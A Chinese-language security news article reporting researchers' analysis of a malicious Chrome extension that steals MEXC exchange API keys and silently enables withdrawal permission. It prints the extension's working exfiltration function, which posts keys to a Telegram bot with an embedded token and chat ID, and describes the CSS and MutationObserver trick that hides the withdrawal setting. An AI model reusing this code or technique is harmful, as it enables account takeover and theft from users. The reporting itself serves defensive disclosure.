一款名为 MEXC API Automator 的恶意 Chrome 扩展正滥用浏览器插件的信任机制,窃取 MEXC 用户的加密货币交易权限。该插件伪装成自动化交易和 API 密钥生成工具,暗中控制新创建的 API 密钥,将普通浏览器会话转变为完整的账户接管通道。
攻击始于 Chrome 应用商店中看似合法的插件页面,该页面承诺为 MEXC 交易所提供"支持交易和提现权限的简易 API 密钥生成"功能。安装后,当受害者打开 MEXC 的 API 管理页面(用户通常在此为机器人和自动化交易创建密钥)时,该扩展便会激活。
隐蔽的权限获取与资金转移
Socket.dev 研究人员经分析确认该扩展实为恶意软件,并将其与代号 jorjortan142 的威胁行为者关联。研究表明,该代码仅在已登录的 MEXC 会话中运行,这意味着攻击者甚至无需窃取传统密码。
该 API 自动化工具突显了攻击者如何利用 Chrome 应用商店的品牌效应建立信任。不同于窃取密码,该扩展专门针对同时具备交易和提现权限的 MEXC API 密钥。这类密钥通常长期有效,被重复用于机器人和脚本,且不像交互式登录那样受到严密监控。
数据窃取与隐蔽传输机制
当新生成的密钥出现在成功弹窗中时,扩展会立即抓取密钥,并将其准备传输至攻击者控制的 Telegram 基础设施。核心窃取功能通过以下简单函数实现:
function sendKeysToTelegram(apiKey, secretKey) {
const botToken = '7534112291:AAF46jJWWo95XsRWkzcPevHW7XNo6cqKG9I';
const chatId = '6526634583';
fetch(`https://api.telegram.org/bot${botToken}/sendMessage`, {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({ chat_id: chatId, text: `API Key: ${apiKey}\nSecret Key: ${secretKey}` })
});
}界面欺骗与权限操控技术
这款基于 Manifest V3 的 Chrome 扩展会向 URL 模式 ://.mexc.com/user/openapi* 注入内容脚本 script.js。当受害者打开目标页面时,脚本会等待 DOM 加载完成,找到 API 创建表单后,自动勾选所有权限复选框(包括提现权限),无需用户额外操作。
为欺骗受害者,脚本篡改页面样式使提现选项看似禁用,而服务器端实际保持启用状态。具体手段包括:从提现复选框中移除"checked"类、通过注入 CSS 隐藏视觉勾选标记,并使用 MutationObserver 确保即使 MEXC 代码恢复该类也再次移除。受害者误以为仅授权了交易权限,实际提交的表单却包含完整提现权限。
由于该扩展仅在浏览器沙盒内运行,仅读取页面内容并通过常规 HTTPS 发送数据,因此能完美融入正常网络流量。当受害者发现异常交易或资金缺失时,攻击者早已将密钥加载到脚本或工具中,无需触碰用户密码即可清空账户。